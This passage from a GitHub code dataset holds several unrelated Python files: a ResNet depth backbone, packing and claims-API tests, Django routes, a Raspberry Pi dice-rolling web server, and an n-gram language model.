{}\".format(i,p.shape))\n\n mask = self.linear(p)\n mask = self.activation_mask(mask)\n \n return mask\n\n","repo_name":"kooBH/UNet","sub_path":"UNet.py","file_name":"UNet.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70649647467","text":"\r\nfrom humpack import pack, unpack, json_unpack, json_pack\r\nfrom _util_test import get_adict\r\n\r\n\r\ndef test_pack_tdict():\r\n\tdata = get_adict()\r\n\trec = unpack(pack(data))\r\n\t\r\n\tassert repr(data) == repr(rec)\r\n\r\n\r\ndef test_json_pack_transactionable():\r\n\tdata = get_adict()\r\n\t\r\n\ts = json_pack(data)\r\n\tassert repr(json_unpack(s)) == repr(data)\r\n\t\r\n\tdata.begin()\r\n\t\r\n\tdata[1234] = 'element'\r\n\tassert 1234 in data\r\n\tassert 'element' == data[1234]\r\n\t\r\n\tdata.abc = 123\r\n\tassert 'abc' in data\r\n\tassert data.abc == 123\r\n\tassert data['abc'] == 123\r\n\t\r\n\tdata.abort()\r\n\t\r\n\tassert repr(json_unpack(s)) == repr(data)\r\n\t\r\n\t","repo_name":"felixludos/HumPack","sub_path":"tests/test_packing.py","file_name":"test_packing.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11746539491","text":"from datetime import date\nimport json\nfrom app.claim import claim_lambda\nfrom test.claims import ClaimTestCase\nfrom app.claim.claims import service\nfrom app.provider.provider import ProviderType\nfrom app.profile.profile import Gender\nfrom test.claims.providers.test_lambdas import provider_test_case\nfrom test.claims.profiles.test_lambdas import profile_test_case\n\n\nclass claimclaimTestCase(ClaimTestCase):\n\n def _retrieve_response_id(self, response):\n dict = json.loads(response['body'])\n return dict['id']\n\n def _insert_claim(self):\n billing_response = 
provider_test_case.create_provider(name=\"Gentem\", address=\"303 YOUNGLOVE AVE, san francisco 94103, CA\",\n npi=\"1568412345\", type=ProviderType.BILLING_PROVIDER.value, phone=\"424-248-7725\")\n billing_provider_id = self._retrieve_response_id(billing_response)\n\n referring_response = provider_test_case.create_provider(name=\"John Lin\", npi=\"1568412346\", type=ProviderType.REFERRING_PROVIDER.value)\n referring_provider_id = self._retrieve_response_id(referring_response)\n\n rendering_response = provider_test_case.create_provider(name=\"Saint Francis Memorial Hospital\", address=\"2900 Hyde St Lower Nob Hill, san francisco 94103, CA\", npi=\"1316061997\", type=ProviderType.RENDERING_PROVIDER.value)\n rendering_provider_id = self._retrieve_response_id(rendering_response)\n\n insured_response = profile_test_case.create_profile(email=\"jon.doe@gmail.com\", last_name=\"Doe\", gender=Gender.MALE.value, first_name=\"Jon\",\n address=\"1 glove drive , san francisco 94103, CA\", member_id=\"ABC100286987\", phone=\"415 1234567\",middle_initial=\"P\", dob=date(1981, 6, 24))\n insured_id = self._retrieve_response_id(insured_response)\n patient_response = profile_test_case.create_profile(email=\"susan.doe@gmail.com\", last_name=\"Doe\", gender=Gender.FEMALE.value, first_name=\"Susan\",\n address=\"1 glove drive , san francisco 94103, CA\", member_id=\"ABC100286987\", phone=\"415 1234567\", dob=date(2015, 10, 19))\n patient_id = self._retrieve_response_id(patient_response)\n\n claim_json = self._create_claim_json(patient_id, referring_provider_id, billing_provider_id, rendering_provider_id, insured_id)\n event = dict(body=claim_json, httpMethod='POST')\n response = claim_lambda.post_claim(event, None)\n return response, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id\n\n def _delete_claim(self, claim_id, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id):\n event = dict(httpMethod='DELETE', pathParameters={'id': claim_id})\n deleted_response = claim_lambda.delete_claim(event, None)\n self.assertIsNotNone(deleted_response['body'])\n self.assertEqual(deleted_response['statusCode'], 200)\n\n profile_test_case.delete_profile(patient_id)\n profile_test_case.delete_profile(insured_id)\n provider_test_case.delete_provider(billing_provider_id)\n provider_test_case.delete_provider(referring_provider_id)\n provider_test_case.delete_provider(rendering_provider_id)\n\n def test_post(self):\n response, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id = self._insert_claim()\n\n self.assertIsNotNone(response['body'])\n self.assertEqual(response['statusCode'], 201)\n claim_dict = json.loads(response['body'])\n self._delete_claim(claim_dict['id'], patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id)\n\n def test_get(self):\n create_response, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id = self._insert_claim()\n\n # Get id\n claim_dict = json.loads(create_response['body'])\n event = dict(httpMethod='GET', pathParameters={'id': claim_dict['id']})\n retrieved_claim = claim_lambda.get_claim(event, None)\n self.assertIsNotNone(retrieved_claim)\n\n self._delete_claim(claim_dict['id'], patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id)\n\n def test_list(self):\n response, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id = 
self._insert_claim()\n\n # List\n event = dict(httpMethod='GET')\n page_string = claim_lambda.list_claim(event, None)\n self.assertIsNotNone(page_string)\n\n claim_dict = json.loads(response['body'])\n self._delete_claim(claim_dict['id'], patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id)","repo_name":"nicoglp/aws-customers","sub_path":"test/claims/test_lambdas.py","file_name":"test_lambdas.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12371986075","text":"from django.urls import path\nfrom django.conf.urls import include\nfrom rest_framework import routers\nfrom api.views import TaskViewSets, CreateUserView, TaskListView, TaskRetriveView, PostListView, PostRetriveView\n\n\nrouter = routers.DefaultRouter()\nrouter.register(\"tasks\", TaskViewSets, basename=\"tasks\")\n\nurlpatterns = [\n path(\"list-post/\", PostListView.as_view(), name=\"list-post\"),\n path(\"detail-post//\", PostRetriveView.as_view(), name=\"detail-post\"),\n path(\"list-task/\", TaskListView.as_view(), name=\"list-task\"),\n path(\"detail-task//\", TaskRetriveView.as_view(), name=\"detail-task\"),\n path(\"register/\", CreateUserView.as_view(), name=\"register\"),\n path(\"auth/\", include(\"djoser.urls.jwt\")),\n path(\"\", include(router.urls)),\n]\n","repo_name":"HDYS-TTBYS/nextjs_blog_todo_api","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19627572436","text":"\"\"\"resnet in pytorch\n[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun.\n Deep Residual Learning for Image Recognition\n https://arxiv.org/abs/1512.03385v1\n\"\"\"\n\nimport warnings\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.checkpoint as cp\n\nfrom mmcv.runner import BaseModule\n\nfrom mmseg.models.builder import DEPTHBACKBONE\n\nconv_cfg = {\n 'Conv': nn.Conv2d,\n}\n\n\ndef build_conv_layer(cfg, *args, **kwargs):\n \"\"\"Build convolution layer.\n Args:\n cfg (None or dict): Cfg should contain:\n type (str): Identify conv layer type.\n layer args: Args needed to instantiate a conv layer.\n Returns:\n nn.Module: Created conv layer.\n \"\"\"\n\n cfg_ = dict(type='Conv')\n \n\n layer_type = cfg_.pop('type')\n if layer_type not in conv_cfg:\n raise KeyError('Unrecognized norm type {}'.format(layer_type))\n else:\n conv_layer = conv_cfg[layer_type]\n\n layer = conv_layer(*args, **kwargs, **cfg_)\n\n return layer\n\nnorm_cfg = {\n # format: layer_type: (abbreviation, module)\n 'BN': ('bn', nn.BatchNorm2d),\n 'SyncBN': ('bn', nn.SyncBatchNorm),\n 'GN': ('gn', nn.GroupNorm),\n # and potentially 'SN'\n}\n\n\ndef build_norm_layer(cfg, num_features, postfix=''):\n \"\"\"Build normalization layer.\n Args:\n cfg (dict): cfg should contain:\n type (str): identify norm layer type.\n layer args: args needed to instantiate a norm layer.\n requires_grad (bool): [optional] whether stop gradient updates\n num_features (int): number of channels from input.\n postfix (int, str): appended into norm abbreviation to\n create named layer.\n Returns:\n name (str): abbreviation + postfix\n layer (nn.Module): created norm layer\n \"\"\"\n assert isinstance(cfg, dict) and 'type' in cfg\n cfg_ = cfg.copy()\n\n layer_type = cfg_.pop('type')\n if layer_type not in norm_cfg:\n raise KeyError('Unrecognized norm type {}'.format(layer_type))\n else:\n abbr, norm_layer = 
norm_cfg[layer_type]\n if norm_layer is None:\n raise NotImplementedError\n\n assert isinstance(postfix, (int, str))\n name = abbr + str(postfix)\n\n requires_grad = cfg_.pop('requires_grad', True)\n cfg_.setdefault('eps', 1e-5)\n if layer_type != 'GN':\n layer = norm_layer(num_features, **cfg_)\n if layer_type == 'SyncBN':\n layer._specify_ddp_gpu_num(1)\n else:\n assert 'num_groups' in cfg_\n layer = norm_layer(num_channels=num_features, **cfg_)\n\n for param in layer.parameters():\n param.requires_grad = requires_grad\n\n return name, layer\n\n\nclass BasicBlock(BaseModule):\n expansion = 1\n\n def __init__(self,\n inplanes,\n planes,\n stride=1,\n dilation=1,\n downsample=None,\n style='pytorch',\n with_cp=False,\n conv_cfg=None,\n norm_cfg=dict(type='BN')):\n super(BasicBlock, self).__init__()\n\n self.norm1_name, norm1 = build_norm_layer(norm_cfg, planes, postfix=1)\n self.norm2_name, norm2 = build_norm_layer(norm_cfg, planes, postfix=2)\n\n self.conv1 = build_conv_layer(\n conv_cfg,\n inplanes,\n planes,\n 3,\n stride=stride,\n padding=dilation,\n dilation=dilation,\n bias=False)\n self.add_module(self.norm1_name, norm1)\n self.conv2 = build_conv_layer(\n conv_cfg, planes, planes, 3, padding=1, bias=False)\n self.add_module(self.norm2_name, norm2)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n self.dilation = dilation\n assert not with_cp\n\n @property\n def norm1(self):\n return getattr(self, self.norm1_name)\n\n @property\n def norm2(self):\n return getattr(self, self.norm2_name)\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.norm1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.norm2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(BaseModule):\n expansion = 4\n\n def __init__(self,\n inplanes,\n planes,\n stride=1,\n dilation=1,\n downsample=None,\n style='pytorch',\n with_cp=False,\n conv_cfg=None,\n norm_cfg=dict(type='BN')):\n \"\"\"Bottleneck block for ResNet.\n If style is \"pytorch\", the stride-two layer is the 3x3 conv layer,\n if it is \"caffe\", the stride-two layer is the first 1x1 conv layer.\n \"\"\"\n super(Bottleneck, self).__init__()\n assert style in ['pytorch', 'caffe']\n\n self.inplanes = inplanes\n self.planes = planes\n self.stride = stride\n self.dilation = dilation\n self.style = style\n self.with_cp = with_cp\n self.conv_cfg = conv_cfg\n self.norm_cfg = norm_cfg\n\n if self.style == 'pytorch':\n self.conv1_stride = 1\n self.conv2_stride = stride\n else:\n self.conv1_stride = stride\n self.conv2_stride = 1\n\n self.norm1_name, norm1 = build_norm_layer(norm_cfg, planes, postfix=1)\n self.norm2_name, norm2 = build_norm_layer(norm_cfg, planes, postfix=2)\n self.norm3_name, norm3 = build_norm_layer(\n norm_cfg, planes * self.expansion, postfix=3)\n\n self.conv1 = build_conv_layer(\n conv_cfg,\n inplanes,\n planes,\n kernel_size=1,\n stride=self.conv1_stride,\n bias=False)\n self.add_module(self.norm1_name, norm1)\n self.conv2 = build_conv_layer(\n conv_cfg,\n planes,\n planes,\n kernel_size=3,\n stride=self.conv2_stride,\n padding=dilation,\n dilation=dilation,\n bias=False)\n self.add_module(self.norm2_name, norm2)\n self.conv3 = build_conv_layer(\n conv_cfg,\n planes,\n planes * self.expansion,\n kernel_size=1,\n bias=False)\n self.add_module(self.norm3_name, norm3)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n\n @property\n def 
norm1(self):\n return getattr(self, self.norm1_name)\n\n @property\n def norm2(self):\n return getattr(self, self.norm2_name)\n\n @property\n def norm3(self):\n return getattr(self, self.norm3_name)\n\n def forward(self, x):\n\n def _inner_forward(x):\n identity = x\n\n out = self.conv1(x)\n out = self.norm1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.norm2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.norm3(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n\n return out\n\n if self.with_cp and x.requires_grad:\n out = cp.checkpoint(_inner_forward, x)\n else:\n out = _inner_forward(x)\n\n out = self.relu(out)\n\n return out\n\n\ndef make_res_layer(block,\n inplanes,\n planes,\n blocks,\n stride=1,\n dilation=1,\n style='pytorch',\n with_cp=False,\n conv_cfg=None,\n norm_cfg=dict(type='BN')):\n downsample = None\n if stride != 1 or inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n build_conv_layer(\n conv_cfg,\n inplanes,\n planes * block.expansion,\n kernel_size=1,\n stride=stride,\n bias=False),\n build_norm_layer(norm_cfg, planes * block.expansion)[1],\n )\n\n layers = []\n layers.append(\n block(\n inplanes=inplanes,\n planes=planes,\n stride=stride,\n dilation=dilation,\n downsample=downsample,\n style=style,\n with_cp=with_cp,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg))\n inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(\n block(\n inplanes=inplanes,\n planes=planes,\n stride=1,\n dilation=dilation,\n style=style,\n with_cp=with_cp,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg))\n\n return nn.Sequential(*layers)\n\n@DEPTHBACKBONE.register_module()\nclass DepthResNet(BaseModule):\n \"\"\"ResNet backbone.\n Args:\n depth (int): Depth of resnet, from {18, 34, 50, 101, 152}.\n in_channels (int): Number of input image channels. Normally 3.\n num_stages (int): Resnet stages, normally 4.\n strides (Sequence[int]): Strides of the first block of each stage.\n dilations (Sequence[int]): Dilation of each stage.\n out_indices (Sequence[int]): Output from which stages.\n style (str): `pytorch` or `caffe`. If set to \"pytorch\", the stride-two\n layer is the 3x3 conv layer, otherwise the stride-two layer is\n the first 1x1 conv layer.\n frozen_stages (int): Stages to be frozen (stop grad and set eval mode).\n -1 means not freezing any parameters.\n norm_cfg (dict): dictionary to construct and config norm layer.\n norm_eval (bool): Whether to set norm layers to eval mode, namely,\n freeze running stats (mean and var). Note: Effect on Batch Norm\n and its variants only.\n with_cp (bool): Use checkpoint or not. Using checkpoint will save some\n memory while slowing down the training speed.\n zero_init_residual (bool): whether to use zero init for last norm layer\n in resblocks to let them behave as identity.\n Example:\n >>> from openselfsup.models import ResNet\n >>> import torch\n >>> self = ResNet(depth=18)\n >>> self.eval()\n >>> inputs = torch.rand(1, 3, 32, 32)\n >>> level_outputs = self.forward(inputs)\n >>> for level_out in level_outputs:\n ... 
print(tuple(level_out.shape))\n (1, 64, 8, 8)\n (1, 128, 4, 4)\n (1, 256, 2, 2)\n (1, 512, 1, 1)\n \"\"\"\n\n arch_settings = {\n 18: (BasicBlock, (2, 2, 2, 2)),\n 34: (BasicBlock, (3, 4, 6, 3)),\n 50: (Bottleneck, (3, 4, 6, 3)),\n 101: (Bottleneck, (3, 4, 23, 3)),\n 152: (Bottleneck, (3, 8, 36, 3))\n }\n\n def __init__(self,\n depth=50,\n in_channels=3,\n num_stages=4,\n strides=(1, 2, 2, 2),\n dilations=(1, 1, 1, 1),\n out_indices=(0, 1, 2, 3, 4),\n style='pytorch',\n frozen_stages=-1,\n conv_cfg=None,\n norm_cfg=dict(type='BN', requires_grad=True),\n norm_eval=False,\n with_cp=False,\n zero_init_residual=False,\n pretrained=None,\n init_cfg=None):\n super(DepthResNet, self).__init__()\n if depth not in self.arch_settings:\n raise KeyError('invalid depth {} for resnet'.format(depth))\n self.zero_init_residual = zero_init_residual\n self.pretrained = pretrained\n block_init_cfg = None\n assert not (init_cfg and pretrained), \\\n 'init_cfg and pretrained cannot be setting at the same time'\n if isinstance(pretrained, str):\n warnings.warn('DeprecationWarning: pretrained is a deprecated, '\n 'please use \"init_cfg\" instead')\n self.init_cfg = dict(type='Pretrained', checkpoint=pretrained)\n elif pretrained is None:\n if init_cfg is None:\n self.init_cfg = [\n dict(type='Kaiming', layer='Conv2d'),\n dict(\n type='Constant',\n val=1,\n layer=['_BatchNorm', 'GroupNorm'])\n ]\n block = self.arch_settings[depth][0]\n if self.zero_init_residual:\n if block is BasicBlock:\n block_init_cfg = dict(\n type='Constant',\n val=0,\n override=dict(name='norm2'))\n elif block is Bottleneck:\n block_init_cfg = dict(\n type='Constant',\n val=0,\n override=dict(name='norm3'))\n else:\n raise TypeError('pretrained must be a str or None')\n\n\n self.depth = depth\n self.num_stages = num_stages\n assert num_stages >= 1 and num_stages <= 4\n self.strides = strides\n self.dilations = dilations\n assert len(strides) == len(dilations) == num_stages\n self.out_indices = out_indices\n assert max(out_indices) < num_stages + 1\n self.style = style\n self.frozen_stages = frozen_stages\n self.conv_cfg = conv_cfg\n self.norm_cfg = norm_cfg\n self.with_cp = with_cp\n self.norm_eval = norm_eval\n self.zero_init_residual = zero_init_residual\n self.block, stage_blocks = self.arch_settings[depth]\n self.stage_blocks = stage_blocks[:num_stages]\n self.inplanes = 64\n\n self._make_stem_layer(in_channels)\n\n self.res_layers = []\n for i, num_blocks in enumerate(self.stage_blocks):\n stride = strides[i]\n dilation = dilations[i]\n planes = 64 * 2**i\n res_layer = make_res_layer(\n self.block,\n self.inplanes,\n planes,\n num_blocks,\n stride=stride,\n dilation=dilation,\n style=self.style,\n with_cp=with_cp,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg)\n self.inplanes = planes * self.block.expansion\n layer_name = 'layer{}'.format(i + 1)\n self.add_module(layer_name, res_layer)\n self.res_layers.append(layer_name)\n\n self.feat_dim = self.block.expansion * 64 * 2**(\n len(self.stage_blocks) - 1)\n\n @property\n def norm1(self):\n return getattr(self, self.norm1_name)\n\n def _make_stem_layer(self, in_channels):\n self.conv1 = build_conv_layer(\n self.conv_cfg,\n in_channels,\n 64,\n kernel_size=7,\n stride=2,\n padding=3,\n bias=False)\n self.norm1_name, norm1 = build_norm_layer(self.norm_cfg, 64, postfix=1)\n self.add_module(self.norm1_name, norm1)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n def forward(self, x):\n outs = []\n x = self.conv1(x)\n x = self.norm1(x)\n x = 
self.relu(x) # r50: 64x128x128\n\n # # remove this hack!\n # x = self.maxpool(x)\n \n if 0 in self.out_indices:\n outs.append(x)\n x = self.maxpool(x) # r50: 64x56x56\n for i, layer_name in enumerate(self.res_layers):\n res_layer = getattr(self, layer_name)\n x = res_layer(x)\n if i + 1 in self.out_indices:\n outs.append(x)\n # r50: 1-256x56x56; 2-512x28x28; 3-1024x14x14; 4-2048x7x7\n return tuple(outs)\n\n","repo_name":"zhyever/DepthFormer","sub_path":"mmdepth/models/backbones/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":15938,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"39383604865","text":"import json\nimport sys\n\n\ndef main(data):\n data = json.load(data)\n for k, v in data.items():\n if type(v) == list:\n print(f'{k}: {\", \".join(map(str,v))}')\n else:\n print(f'{k}: {v}')\n\n\nif __name__ == '__main__':\n main(sys.stdin)\n \n","repo_name":"Serebryankka/My-Solutions-Python-Generation-a-course-for-professionals","sub_path":"Module_4/Module_4_4/Module_4_4_6.py","file_name":"Module_4_4_6.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22133382689","text":"import RPi.GPIO as GPIO\nimport time\nimport os\nimport picamera\nimport bottle\nfrom bottle import route, run, template, redirect, static_file\nfrom shutil import copyfile\nimport wrfl_count\nimport json\nimport wrfl_twitter\n\n\n\nbottle.TEMPLATE_PATH.insert(0,'/opt/wrfl/views')\n\n# Pin 18 als Ausgang deklarieren\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(18, GPIO.OUT)\n\nCAMLED = 32\nGPIO.setup(CAMLED, GPIO.OUT, initial=False)\n\nServo = GPIO.PWM(18, 50)\n\n\ndef fileAge(fname):\n # returns age of file in seconds\n st = os.stat(fname)\n age = (time.time() - st.st_mtime)\n return age\n\n\ndef isRolling():\n # checks if a request is active\n if os.path.isfile('rolling'):\n # ignore too old files\n if fileAge('rolling') > 30:\n endRolling()\n return False\n else:\n return True\n\n\ndef startRolling():\n # touches file to indicate an active roll process\n open('rolling', 'a').close()\n\n\ndef endRolling():\n # removes file to indicate and of roll process\n if os.path.exists('rolling'):\n os.unlink('rolling')\n\n\ndef rollDice():\n startRolling()\n try:\n Servo.start(1.55)\n time.sleep(1)\n Servo.start(7)\n with picamera.PiCamera() as camera:\n camera.resolution = (1024, 768)\n camera.color_effects = (128, 128)\n camera.start_preview()\n\n # crop (x,y,w,h), values range: [0,1]\n # camera.crop = (0.53, 0.28, 0.16, 0.2)\n camera.crop = (0.56, 0.28, 0.16, 0.2) # slightly right\n\n\n GPIO.output(CAMLED,False)\n # Camera warm-up time\n time.sleep(0.8)\n camera.capture('/opt/wrfl/img/w.jpg', resize=(60, 60))\n\n pip = wrfl_count.countPip()\n f = open('pip.txt', 'w')\n f.write(str(pip))\n f.close()\n\n pipStr = '-' + ('u' if pip == 0 else str(pip))\n target = '/opt/wrfl/img/foo-'+ str(int(time.time())) + pipStr + '.jpg'\n copyfile('/opt/wrfl/img/w.jpg', target)\n\n if pip > 0:\n wrfl_twitter.tweet('eine ' + str(pip))\n else:\n wrfl_twitter.tweet('unklar')\n\n except:\n # remove file in any case\n endRolling()\n\n endRolling()\n\n\n\n\ndef readPip():\n if os.path.exists('pip.txt'):\n f = open('pip.txt', 'r')\n pip = f.read()\n f.close()\n else:\n pip = 23\n\n return int(pip)\n\n\n\n@route('/')\ndef index():\n timestamp = int(time.time())\n pip = readPip()\n\n return template('index', timestamp=timestamp, 
pip=pip)\n\n\n@route('/wrfl')\ndef index():\n    if isRolling():\n        jsonData = json.dumps({'error': 1})\n    else:\n        rollDice()\n        pip = readPip()\n        jsonData = json.dumps({'pip':pip})\n\n    return str(jsonData)\n\n\n\n@route('/img/<filename>')\ndef server_static(filename):\n    return static_file(filename, root='/opt/wrfl/img')\n\n\n@route('/resources/<filename>')\ndef server_static(filename):\n    return static_file(filename, root='/opt/wrfl/resources')\n\n\n@route('/css/<filename>')\ndef server_static(filename):\n    return static_file(filename, root='/opt/wrfl/css')\n\n\n\nrun(host='0.0.0.0', port=8080, server='paste')\n#run(host='0.0.0.0', port=8080)\n\n","repo_name":"KombinatAeppaeraet/WRFL","sub_path":"wrfl.py","file_name":"wrfl.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"23557221272","text":"#Read file \nimport re\nimport math\nfrom itertools import product\n\nstart_word = \"\"\nend_word = \"\"\n\ndef readData(file_path):\n\twith open(file_path) as file: \n\t\t \treturn [re.split(\"\\s+\", line.rstrip('\\n')) for line in file]\n\ndef calculate_Num_UniGram(sentences):\n\tunigram_count = 0\n\tfor s in sentences:\n\t\tunigram_count += len(s) - 2\n\treturn unigram_count\n\n\n\ndef calculate_NUM_BiGrame(sentences):\n\tbigram_count = 0\n\tfor s in sentences:\n\t\tbigram_count += len(s) - 1\n\treturn bigram_count\n\nclass UniGramLM:\n\tdef __init__(self, sentences, smoothing=False):\n\t\tself.uni_freq = dict()\n\t\tself.corpus_len = 0\n\t\tfor s in sentences:\n\t\t \tfor w in s:\n\t\t \t\tself.uni_freq[w] = self.uni_freq.get(w, 0) + 1\n\t\t \t\t#print(self.uni_freq[w])\n\t\t \t\tif w != start_word and w != end_word:\n\t\t \t\t\tself.corpus_len += 1\n\t\tself.num_unique_words = len(self.uni_freq) - 2\n\n\t# unigram = count(word)/count(words)\n\tdef prob_unigram(self, word):\n\t\tnum_word = self.uni_freq.get(word, 0)\n\t\tnum_corpus_word = self.corpus_len\n\t\treturn float(num_word) / float(num_corpus_word)\n\n\n\t# sentence prob = multiple of prob word unigram P(a b c) = P(a) * P(b) * P(c)\n\tdef sentence_prob(self, sentence, normalize_prob=True):\n\t\tlog_sum_prob_sen = 0\n\t\tprob_sen = 1\n\t\tfor w in sentence:\n\t\t\tword_prob = self.prob_unigram(w)\n\t\t\tprob_sen *= word_prob\n\t\tlog_sum_prob_sen = math.log(prob_sen, 2)\n\t\treturn math.pow(2, log_sum_prob_sen) if normalize_prob else log_sum_prob_sen\n\nclass NGram:\n\tdef __init__(self, sentences, nGram, smoothing=False):\n\t\tself.N_freq = dict()\n\t\tself.N_1_freq = dict()\n\t\tself.N_Prob = dict()\n\t\tself.N_freq = self.NGram_count(sentences, nGram)\n\t\tself.N_1_freq = self.NGram_count(sentences, nGram - 1)\n\t\tself.N_Prob = self.NGram_prob(nGram)\n\n\t# Counting the number of n words\n\tdef NGram_count(self, sentences, nGram):\n\t\tN_freq = dict()\n\t\tfor s in sentences:\n\t\t\tprevious_words = ()\n\t\t\tpr = tuple(s)\n\t\t\tn_count = 0\n\t\t\tfor index in range(len(pr) + 1 - nGram):\n\t\t\t\tn_count = index\n\t\t\t\tfor ind in range(nGram):\n\t\t\t\t\tprevious_words += (pr[n_count + ind],)\n\n\t\t\t\tif len(previous_words) == nGram:\n\t\t\t\t\tN_freq[(previous_words)] = N_freq.get((previous_words),0) + 1\n\t\t\t\t\tprevious_words = ()\n\t\treturn N_freq\n\n\t# Estimate probability of NGram\n\tdef NGram_prob(self, nGram):\n\t\tfor k, v in self.N_freq.items():\n\t\t\tfor k_1, v_1 in self.N_1_freq.items():\n\t\t\t\tfor index in range(len(k) + 1 - nGram):\n\t\t\t\t\tif k_1 == k[index:index + nGram - 1]:\n\t\t\t\t\t\t#print(\"P\" + str(k) + \"= \" + 
str(float(v/v_1)))\n\t\t\t\t\t\tself.N_Prob[k] = float(v/v_1)\n\t\t\t\t\t\tbreak\n\t\treturn self.N_Prob\n\n\t# Estimate log probability of a sentence\n\tdef NGram_sentence_prob_log(self, nGram, sentence):\n\t\tprevious_words = ()\n\t\tpr = sentence.split(\" \")\n\t\tpr = tuple(pr)\n\t\tn_count = 0\n\t\ts_freq = []\n\t\tprob_sum_log = 0.0\n\n\t\tfor index in range(len(pr) + 1 - nGram):\n\t\t\tn_count = index\n\t\t\tfor ind in range(nGram):\n\t\t\t\tprevious_words += (pr[n_count + ind],)\n\n\t\t\tif len(previous_words) == nGram:\n\t\t\t\ts_freq.append(previous_words)\n\t\t\t\tprevious_words = () \n\n\t\tfor n_key in s_freq:\n\t\t\tprob = self.N_Prob.get(n_key)\n\t\t\t# unseen n-grams are skipped, since log(0) is undefined and no smoothing is applied\n\t\t\tif prob:\n\t\t\t\tprob_sum_log += math.log(prob)\n\t\treturn prob_sum_log\n\t\n\t# Estimate prob of a sentence\n\tdef NGram_sentence_prob(self, nGram, sentence):\n\t\tprevious_words = ()\n\t\tpr = sentence.split(\" \")\n\t\tpr = tuple(pr)\n\t\tn_count = 0\n\t\ts_freq = []\n\n\t\tfor index in range(len(pr) + 1 - nGram):\n\t\t\tn_count = index\n\t\t\tfor ind in range(nGram):\n\t\t\t\tprevious_words += (pr[n_count + ind],)\n\n\t\t\tif len(previous_words) == nGram:\n\t\t\t\ts_freq.append(previous_words)\n\t\t\t\tprevious_words = () \n\n\t\tprob_mul = 1.0\n\t\tfor n_key in s_freq:\n\t\t\tprob_mul *= self.N_Prob.get(n_key, 1)\t\n\n\t\treturn prob_mul\n\n\t# perplexity as defined in chapter 4, Language Modeling with N-grams: PP(W) = P(W)^(-1/N)\n\tdef NGram_perplexity(self, biGramML, sentence, nGram=2):\n\t\tprob_w = biGramML.NGram_sentence_prob(nGram, sentence)\n\t\tn_gram_count = len(sentence.split(\" \")) - 2\t# exclude the two sentence-boundary markers\n\t\texp = -1 / n_gram_count\n\t\treturn math.pow(prob_w, exp)\n\n\nif __name__ == '__main__':\n\n\t# corpus for Language Model\n\tdata = readData(\"./sampledata.txt\")\n\n\t# Test sentence\n\tsentence = \" I am a man I do not like \"\n\n\t# Number of Ngram\n\tN_Gram = 2\n\n\t# Language Models\n\tnGramML = NGram(data, N_Gram, smoothing=False)\n\tbiGramML = NGram(data, 2, smoothing=False)\n\n\t# Estimate probability for language model\n\tnGramML.NGram_prob(N_Gram)\n\n\t# Calculate perplexity of the test sentence\n\tprint(nGramML.NGram_perplexity(biGramML, sentence))\n\n\t# Calculate the probability of a sentence\n\tprint(\"probability of sentence = \" + str(nGramML.NGram_sentence_prob_log(N_Gram, sentence)))\n","repo_name":"TrungThanhTran/Natural-Language-Processing-and-Speech","sub_path":"chapter4/language-models/languagemodel.py","file_name":"languagemodel.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
